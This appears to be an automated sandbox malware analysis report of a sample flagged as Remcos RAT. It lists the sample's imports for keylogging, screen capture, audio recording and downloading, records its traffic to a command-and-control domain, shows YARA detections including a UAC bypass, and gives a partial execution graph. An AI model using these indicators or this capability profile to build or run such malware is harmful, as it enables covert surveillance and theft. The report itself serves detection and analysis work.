                                            USER32.dllGetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, DispatchMessageA, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, AppendMenuA, GetSystemMetrics, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetWindowThreadProcessId, MapVirtualKeyA, DrawIcon, GetIconInfo
                                            GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                                            ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                                            SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                            ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                                            SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                                            WINMM.dllwaveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader, waveInUnprepareHeader
                                            WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                                            urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                            gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                                            WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-16T18:50:18.157431+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972094.103.125.19610521TCP
                                            2024-10-16T18:50:20.385265+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549725178.237.33.5080TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 16, 2024 18:50:17.260015965 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:17.265153885 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:17.265232086 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:17.270020008 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:17.274952888 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.102761984 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.157430887 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:18.218858957 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.266776085 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:18.370668888 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:18.375901937 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.375958920 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:18.380906105 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.380954981 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:18.385931969 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.644880056 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:18.646743059 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:18.651626110 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:19.033107042 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:19.079314947 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:19.104152918 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:19.109201908 CEST8049725178.237.33.50192.168.2.5
                                            Oct 16, 2024 18:50:19.109425068 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:19.109425068 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:19.114351034 CEST8049725178.237.33.50192.168.2.5
                                            Oct 16, 2024 18:50:20.385216951 CEST8049725178.237.33.50192.168.2.5
                                            Oct 16, 2024 18:50:20.385265112 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:20.385272026 CEST8049725178.237.33.50192.168.2.5
                                            Oct 16, 2024 18:50:20.385310888 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:20.390446901 CEST8049725178.237.33.50192.168.2.5
                                            Oct 16, 2024 18:50:20.390587091 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:20.458313942 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:20.463293076 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:21.090712070 CEST8049725178.237.33.50192.168.2.5
                                            Oct 16, 2024 18:50:21.094866037 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:50:46.188527107 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:50:46.190273046 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:50:46.195190907 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:51:16.309235096 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:51:16.325007915 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:51:16.329926968 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:51:46.432149887 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:51:46.433511019 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:51:46.438411951 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:52:09.095192909 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:09.469882011 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:10.172981024 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:11.469881058 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:13.876118898 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:16.850617886 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:52:16.852188110 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:52:16.857201099 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:52:18.860495090 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:28.469856024 CEST4972580192.168.2.5178.237.33.50
                                            Oct 16, 2024 18:52:47.399009943 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:52:47.400584936 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:52:47.406414032 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:53:18.298175097 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:53:18.299853086 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:53:18.305103064 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:53:49.691703081 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:53:49.693208933 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:53:49.698359966 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:54:21.224200010 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:54:21.225131989 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:54:21.225194931 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:54:21.225563049 CEST105214972094.103.125.196192.168.2.5
                                            Oct 16, 2024 18:54:21.225620031 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:54:21.225827932 CEST4972010521192.168.2.594.103.125.196
                                            Oct 16, 2024 18:54:21.238130093 CEST105214972094.103.125.196192.168.2.5

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 16, 2024 18:50:16.387418985 CEST5451353192.168.2.51.1.1.1
                                            Oct 16, 2024 18:50:17.256797075 CEST53545131.1.1.1192.168.2.5
                                            Oct 16, 2024 18:50:19.092266083 CEST5454453192.168.2.51.1.1.1
                                            Oct 16, 2024 18:50:19.100752115 CEST53545441.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 16, 2024 18:50:16.387418985 CEST192.168.2.51.1.1.10xa97eStandard query (0)embargogo237.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 16, 2024 18:50:19.092266083 CEST192.168.2.51.1.1.10xb45cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 16, 2024 18:50:17.256797075 CEST1.1.1.1192.168.2.50xa97eNo error (0)embargogo237.duckdns.org94.103.125.196A (IP address)IN (0x0001)false
                                            Oct 16, 2024 18:50:19.100752115 CEST1.1.1.1192.168.2.50xb45cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • geoplugin.net

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549725178.237.33.50801516C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 16, 2024 18:50:19.109425068 CEST71OUTGET /json.gp HTTP/1.1
                                            Host: geoplugin.net
                                            Cache-Control: no-cache
                                            Oct 16, 2024 18:50:20.385216951 CEST1164INHTTP/1.1 200 OK
                                            date: Wed, 16 Oct 2024 16:50:19 GMT
                                            server: Apache
                                            content-length: 956
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                            Oct 16, 2024 18:50:20.385272026 CEST1164INHTTP/1.1 200 OK
                                            date: Wed, 16 Oct 2024 16:50:19 GMT
                                            server: Apache
                                            content-length: 956
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                            Oct 16, 2024 18:50:20.390446901 CEST1164INHTTP/1.1 200 OK
                                            date: Wed, 16 Oct 2024 16:50:19 GMT
                                            server: Apache
                                            content-length: 956
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:12:50:14
                                            Start date:16/10/2024
                                            Path:C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe"
                                            Imagebase:0x400000
                                            File size:494'592 bytes
                                            MD5 hash:3904BABB53D5BBDAB7E0785A533A58D7
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:4.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:21%
                                              Total number of Nodes:1419
                                              Total number of Limit Nodes:66
                                              execution_graph 47194 415d41 47209 41b411 47194->47209 47196 415d4a 47220 4020f6 47196->47220 47200 415d65 47201 4170c4 47200->47201 47227 401fd8 47200->47227 47230 401e8d 47201->47230 47205 401fd8 11 API calls 47206 4170d9 47205->47206 47207 401fd8 11 API calls 47206->47207 47208 4170e5 47207->47208 47236 4020df 47209->47236 47214 41b456 InternetReadFile 47218 41b479 47214->47218 47216 41b4a6 InternetCloseHandle InternetCloseHandle 47217 41b4b8 47216->47217 47217->47196 47218->47214 47218->47216 47219 401fd8 11 API calls 47218->47219 47247 4020b7 47218->47247 47219->47218 47221 40210c 47220->47221 47222 4023ce 11 API calls 47221->47222 47223 402126 47222->47223 47224 402569 28 API calls 47223->47224 47225 402134 47224->47225 47226 404aa1 61 API calls _Yarn 47225->47226 47226->47200 47228 4023ce 11 API calls 47227->47228 47229 401fe1 47228->47229 47229->47201 47231 402163 47230->47231 47235 40219f 47231->47235 47304 402730 11 API calls 47231->47304 47233 402184 47305 402712 11 API calls std::_Deallocate 47233->47305 47235->47205 47237 4020e7 47236->47237 47253 4023ce 47237->47253 47239 4020f2 47240 43bda0 47239->47240 47245 4461b8 __Getctype 47240->47245 47241 4461f6 47259 44062d 20 API calls _abort 47241->47259 47242 4461e1 RtlAllocateHeap 47244 41b42f InternetOpenW InternetOpenUrlW 47242->47244 47242->47245 47244->47214 47245->47241 47245->47242 47258 443001 7 API calls 2 library calls 47245->47258 47248 4020bf 47247->47248 47249 4023ce 11 API calls 47248->47249 47250 4020ca 47249->47250 47260 40250a 47250->47260 47252 4020d9 47252->47218 47254 4023d8 47253->47254 47255 402428 47253->47255 47254->47255 47257 4027a7 11 API calls std::_Deallocate 47254->47257 47255->47239 47257->47255 47258->47245 47259->47244 47261 40251a 47260->47261 47262 402520 47261->47262 47263 402535 47261->47263 47267 402569 47262->47267 47277 4028e8 47263->47277 47266 402533 47266->47252 47288 402888 47267->47288 47269 40257d 47270 402592 47269->47270 47271 4025a7 47269->47271 47293 402a34 22 API calls 47270->47293 47273 4028e8 28 API calls 47271->47273 47275 4025a5 47273->47275 47274 40259b 47294 4029da 22 API calls 47274->47294 47275->47266 47278 4028f1 47277->47278 47279 402953 47278->47279 47280 4028fb 47278->47280 47302 4028a4 22 API calls 47279->47302 47283 402904 47280->47283 47284 402917 47280->47284 47296 402cae 47283->47296 47285 402915 47284->47285 47287 4023ce 11 API calls 47284->47287 47285->47266 47287->47285 47289 402890 47288->47289 47290 402898 47289->47290 47295 402ca3 22 API calls 47289->47295 47290->47269 47293->47274 47294->47275 47297 402cb8 __EH_prolog 47296->47297 47303 402e54 22 API calls 47297->47303 47299 4023ce 11 API calls 47301 402d92 47299->47301 47300 402d24 47300->47299 47301->47285 47303->47300 47304->47233 47305->47235 47306 426a77 47307 426a8c 47306->47307 47313 426b1e 47306->47313 47308 426bd5 47307->47308 47309 426ad9 47307->47309 47310 426b4e 47307->47310 47311 426bae 47307->47311 47307->47313 47316 426b83 47307->47316 47320 426b0e 47307->47320 47334 424f6e 49 API calls _Yarn 47307->47334 47308->47313 47339 4261e6 28 API calls 47308->47339 47309->47313 47309->47320 47335 41fbfd 52 API calls 47309->47335 47310->47313 47310->47316 47337 41fbfd 52 API calls 47310->47337 47311->47308 47311->47313 47322 425b72 47311->47322 47316->47311 47338 425781 21 API calls 47316->47338 47320->47310 47320->47313 47336 424f6e 49 API calls _Yarn 47320->47336 47323 425b91 ___scrt_get_show_window_mode 47322->47323 47325 425ba0 47323->47325 47329 425bc5 47323->47329 47340 41ec4c 21 API calls 47323->47340 47325->47329 47333 425ba5 47325->47333 47341 420669 46 API calls 47325->47341 47328 425bae 47328->47329 47344 424d96 21 API calls 2 library calls 47328->47344 47329->47308 47331 425c48 47331->47329 47342 432f55 21 API calls _Yarn 47331->47342 47333->47328 47333->47329 47343 41daf0 49 API calls 47333->47343 47334->47309 47335->47309 47336->47310 47337->47310 47338->47311 47339->47313 47340->47325 47341->47331 47342->47333 47343->47328 47344->47329 47345 4437fd 47346 443806 47345->47346 47351 44381f 47345->47351 47347 44380e 47346->47347 47352 443885 47346->47352 47349 443816 47349->47347 47363 443b52 22 API calls 2 library calls 47349->47363 47353 443891 47352->47353 47354 44388e 47352->47354 47364 44f45d GetEnvironmentStringsW 47353->47364 47354->47349 47357 44389e 47359 446802 _free 20 API calls 47357->47359 47360 4438d3 47359->47360 47360->47349 47362 4438a9 47372 446802 47362->47372 47363->47351 47365 44f471 47364->47365 47366 443898 47364->47366 47378 4461b8 47365->47378 47366->47357 47371 4439aa 26 API calls 3 library calls 47366->47371 47368 446802 _free 20 API calls 47370 44f49f FreeEnvironmentStringsW 47368->47370 47369 44f485 _Yarn 47369->47368 47370->47366 47371->47362 47373 44680d RtlFreeHeap 47372->47373 47374 446836 __dosmaperr 47372->47374 47373->47374 47375 446822 47373->47375 47374->47357 47387 44062d 20 API calls _abort 47375->47387 47377 446828 GetLastError 47377->47374 47379 4461f6 47378->47379 47380 4461c6 __Getctype 47378->47380 47386 44062d 20 API calls _abort 47379->47386 47380->47379 47381 4461e1 RtlAllocateHeap 47380->47381 47385 443001 7 API calls 2 library calls 47380->47385 47381->47380 47383 4461f4 47381->47383 47383->47369 47385->47380 47386->47383 47387->47377 47388 43bea8 47390 43beb4 _swprintf ___DestructExceptionObject 47388->47390 47389 43bec2 47404 44062d 20 API calls _abort 47389->47404 47390->47389 47392 43beec 47390->47392 47399 445909 EnterCriticalSection 47392->47399 47394 43bec7 ___DestructExceptionObject _abort 47395 43bef7 47400 43bf98 47395->47400 47399->47395 47401 43bfa6 47400->47401 47403 43bf02 47401->47403 47406 4497ec 37 API calls 2 library calls 47401->47406 47405 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47403->47405 47404->47394 47405->47394 47406->47401 47407 434918 47408 434924 ___DestructExceptionObject 47407->47408 47434 434627 47408->47434 47410 43492b 47412 434954 47410->47412 47732 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47410->47732 47420 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47412->47420 47733 4442d2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47412->47733 47414 43496d 47416 434973 ___DestructExceptionObject 47414->47416 47734 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47414->47734 47417 4349f3 47445 434ba5 47417->47445 47420->47417 47735 443487 36 API calls 3 library calls 47420->47735 47427 434a15 47428 434a1f 47427->47428 47737 4434bf 28 API calls _abort 47427->47737 47430 434a28 47428->47430 47738 443462 28 API calls _abort 47428->47738 47739 43479e 13 API calls 2 library calls 47430->47739 47433 434a30 47433->47416 47435 434630 47434->47435 47740 434cb6 IsProcessorFeaturePresent 47435->47740 47437 43463c 47741 438fb1 10 API calls 4 library calls 47437->47741 47439 434641 47440 434645 47439->47440 47742 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47439->47742 47440->47410 47442 43464e 